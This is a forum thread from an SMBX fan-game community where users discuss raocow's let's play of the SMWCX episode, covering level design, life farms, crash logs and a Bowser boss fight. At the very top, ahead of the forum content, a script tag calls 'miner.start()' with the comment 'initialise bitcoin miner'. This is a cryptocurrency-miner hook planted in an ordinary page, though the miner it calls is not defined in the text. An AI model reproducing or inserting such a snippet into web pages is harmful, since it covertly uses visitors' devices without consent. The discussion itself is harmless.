<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitypge projectmario fan games galaxy

SMWCX - Credits

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Re: SMWCX - Samoyede

Postby Leet » 3 years ago

TaviTurnip wrote:I didn't mind the idea of potentially being "stranded" with the donut blocks (considering that's not a guaranteed loss scenario at all) but that makes a lot more sense.
It actually is if you kill all the dudes, you can't really bring the bombs over from the other pipe in time unless the ground around that pipe has been kept perfectly intact
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Pyro
cutest girl 2023

Postby Pyro » 3 years ago

SnoruntPyro - Today at 5:22 PM
hi
zlaker i played cloudtop castlewalls in smwcx
it's a meeeeeeeeeeeeeeeeeeeeeeeeme
Chocolaedit8 ♫♪ - Today at 5:23 PM
yeh
Enjl - Today at 5:23 PM
yes
cloudtop castlewars
cloudtop linik
ẓłªKÈᖇʛĪЯŁ357 - Today at 5:23 PM
EWWWWWWWWWWWWWW
THAT LEVEL
SnoruntPyro - Today at 5:27 PM
its a FUCKIING MEME
ẓłªKÈᖇʛĪЯŁ357 - Today at 5:29 PM
;_;
clodutop castlewalls was an accident

Imaynotbehere4long
Gone, but...yeah, pretty much forgotten.

Postby Imaynotbehere4long » 3 years ago

Stink Terios wrote:The second level isn't any clearer when you've played Pikmin, and the first sections with infinite bulborbs kinda feels like the game broke until you hit the bridge by accident.
I put a bridge right at the beginning of the level in an attempt to convey the gimmick better.

By the way, what is the title a reference to? Google keeps saying that it's a type of dog.
My SMBX portfolio:
(includes a Sonic 3D Blast styled level.)

SOMEONE ANSWER MY CRY FOR HELP: http://www.supermariobrosx.org/forums/v ... =69&t=2026

Grounder

Postby Grounder » 3 years ago

Imaynotbehere4long wrote:
Stink Terios wrote:The second level isn't any clearer when you've played Pikmin, and the first sections with infinite bulborbs kinda feels like the game broke until you hit the bridge by accident.
I put a bridge right at the beginning of the level in an attempt to convey the gimmick better.

By the way, what is the title a reference to? Google keeps saying that it's a type of dog.
Solatorobo: Red the Hunter

It's a floating forest type place.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

Ometeotl

Postby Ometeotl » 3 years ago

Pyro wrote:SnoruntPyro - Today at 5:22 PM
hi
yeh
yes
cloudtop castlewars
cloudtop linik
EWWWWWWWWWWWWWW
THAT LEVEL
its a FUCKIING MEME
;_;
Someone translate this please.

Grounder

Postby Grounder » 3 years ago

Ometeotl wrote:
Pyro wrote:SnoruntPyro - Today at 5:22 PM
hi
yeh
yes
cloudtop castlewars
cloudtop linik
EWWWWWWWWWWWWWW
THAT LEVEL
its a FUCKIING MEME
;_;
Someone translate this please.
"hi every1 im new!!!!!!! holds up spork my name is katy but u can call me t3h PeNgU1N oF d00m!!!!!!!! lol…as u can see im very random!!!! thats why i came here, 2 meet random ppl like me _… im 13 years old (im mature 4 my age tho!!) i like 2 watch invader zim w/ my girlfreind (im bi if u dont like it deal w/it) its our favorite tv show!!! bcuz its SOOOO random!!!! shes random 2 of course but i want 2 meet more random ppl =) like they say the more the merrier!!!! lol…neways i hope 2 make alot of freinds here so give me lots of commentses!!!!
DOOOOOMMMM!!!!!!!!!!!!!!!! <--- me bein random again _^ hehe…toodles!!!!!

love and waffles,

t3h PeNgU1N oF d00m"
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

Sebby19

Postby Sebby19 » 3 years ago

Ometeotl wrote:For a dissertation of the gimmick in this level, please turn to page 392 on the included omnibus.
I chuckled at this.
Mata Hari wrote:Oh man a sick satire on that one guy I forgot the name of!?
Not at this.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

xfix
:)
First name: Konrad Borowski

Postby xfix » 3 years ago

So that's why raocow played Wario Land 4. Now it all makes sense.

Voltgloss
The first story's end.
Pronouns: he/him/his

Re: SMWCX - Jiggle Jungle

Postby Voltgloss » 3 years ago

The Wario Land 4 "hurry up" music reaches the "when raocow often sings along part" (at 9:10 in the video) about 108 seconds after the start. So when he grabbed the star at 9:37, he had about 25 seconds remaining.

Lejes

Postby Lejes » 3 years ago

If only SMBX people spent half as much effort to make fun levels as they do to prevent life farms.

A life farm that snuck through anyway, for raocow or anyone else playing the episode:

World 3, Valak Mountain
http://i.imgur.com/wSpLJCT.png

Stink Terios

Postby Stink Terios » 3 years ago

Lejes wrote: A life farm that snuck through anyway, for raocow or anyone else playing the episode:

World 3, Valak Mountain
http://i.imgur.com/wSpLJCT.png
You are a hero.

TaviTurnip
Reach for the top
Abministrator
First name: Rena

Postby TaviTurnip » 3 years ago

This greatly reminds me of a recent Patreon question I asked. I'd probably go out of my way to leave a life farm in the game rather than attempt to remove it. Like c'mon xD Have some fun, designer dudes. The rest of the game is clearly attempting to have fun with itself.
Don't bother fighting if you don't intend to win.

Leet

I liked the original Bowser fight better. It's harder, but way more creative. raocow you would probably be interested in finding a video of it or something, though i kinda doubt one exists.
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Mabel
Just west of wierd

Postby Mabel » 3 years ago

Leet wrote:I liked the original Bowser fight better. It's harder, but way more creative. raocow you would probably be interested in finding a video of it or something, though i kinda doubt one exists.
im sure Bossedit keeps copies of bosses, he more than likely has a vid of it on his channel.
Image Image

TaviTurnip
Reach for the top
Abministrator

Re: SMWCX - Syrup Castle

Speaking of that Patreon question: raocow jump on one of the shells at the end gosh so many extra lives squandered by not getting that last hit >:C Also au = gold, you silly Frenchman.

On Bossedit's level: it reminded me a lot of Kagome Kagome and I wasn't even sure he was the maker of that level when I thought this, so that's probably what you "recognized" about it. Also I'm always happy to see a new spin on SMB3 Bowser even if the spin is pretty gentle and simple. Finding new ways to play with that boss is always good. (Less excited to see another SMBx-style interior level that has you retread the same bit of level 3-4 times in a "loop" achieved simply by warping, but alas.)

Stink Terios

Postby Stink Terios » 3 years ago

Fortress of Au was a sad experience for me. It kept crashing at the start on 2.0!
Playing on 1.3 wasn't much better either since that's a stuttering garbage fire that killed me way too much for an easy, short level!

Have a couple crash logs:

http://pastebin.com/v6kjXjFt
http://pastebin.com/1rq1Biki

memnarch

Postby memnarch » 3 years ago

Are Bosseditor and Bossedit8 the same person?
Same person from Giantitp.com

(pronounced mem-nark)

Sebby19

Postby Sebby19 » 3 years ago

That song wasn't from Super Mario 64. It's from Super Mario Galaxy 1!
Okay, the original version was SM64. In fact, there are 4 versions!

-SM64
-SMG1
-SMG2
-Mario & Sonic at the Winter Games (Vancouver)
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

Imaynotbehere4long
Gone, but...yeah, pretty much forgotten.

Postby Imaynotbehere4long » 3 years ago

If anyone is interested in playing the ORIGINAL version of Bowser's Dark Castle, download this:

https://www.dropbox.com/s/s5sjvut8wdjki ... l.zip?dl=0

If anyone is interested in playing the version of Bowser's Dark Castle that was used in SMWCX version 1.0, download this:

http://www.mediafire.com/download/37688 ... edited.zip
memnarch wrote:Are Bosseditor and Bossedit8 the same person?
Yes; that's just his username on SMWC.
My SMBX portfolio:
(includes a Sonic 3D Blast styled level.)

SOMEONE ANSWER MY CRY FOR HELP: http://www.supermariobrosx.org/forums/v ... =69&t=2026

Zephyr_DragonLord
The dragon awakens...!
First name: Zach

Postby Zephyr_DragonLord » 3 years ago

Mmm... I like when raocow struggles with bosses. He does some really silly things trying to make a winning run happen.
The levels were pretty nice today, and the second one might actually be a decent life farm, with the goopas, and kicking the shell at the end.

Heck, pretty much every level in this was a hit so far. The one that I have the most beef with is the Pikmin level, and that's for being potentially awkward to hit the bridges. (Otherwise, it's solid, anyways)

I'm enjoying this quite a bit, and am going to continue lurking in that mobile bush there. So, if you would excuse me...
I am prone to almost everything... except spontaneous violence.
Any questions, concerns, or aspirations you have with me can go to the PM box... Now here's a quote:
raocow wrote:I know there is a population on Earth. They like to populate. I like to gesticulate. We're friends!
(It was about time)

strongbadman

Postby strongbadman » 3 years ago

Leet wrote:I liked the original Bowser fight better. It's harder, but way more creative. raocow you would probably be interested in finding a video of it or something, though i kinda doubt one exists.
See, the problem with the original bowser level was that he was constantly getting stuck on things. Some of the layout of the area just plain didn't work. Trying to guide him down with you was one thing, but he would consistently get caught in the spike shaft, even when I had invincibility and infinite flying on.

ztarwuff
What the heck is a flair and why am I being asked to write one for my profile?
Location: Within 2 miles of the Imperial Crypt of Napoleon III

Postby ztarwuff » 3 years ago

You know, that beet in the lava room reminded me: has anybody fixed the mushroom in lava crash bug in the latest SMBX version? If not, Mabel was being really risky there.

TaviTurnip
Reach for the top
Abministrator

I think that got fixed for MaGL X2. I know I designed my level around it but later found out it wasn't a concern.

... Dunno about this SMBx version, though.

Cirno

Postby Cirno » 3 years ago

I'm pretty sure it's fixed in this version? That said, the game was made on and plays in 1.3, so it was still taking a risk of some kind.

Leet

strongbadman wrote:
See, the problem with the original bowser level was that he was constantly getting stuck on things. Some of the layout of the area just plain didn't work. Trying to guide him down with you was one thing, but he would consistently get caught in the spike shaft, even when I had invincibility and infinite flying on.
I know, I played it and beat it and it was still doable. It just required getting used to the layout. After I got used to the fight, my main problem was getting hit by him. It's finnicky, but it's still more than possible to get through the spike shaft.

Return to “let's play”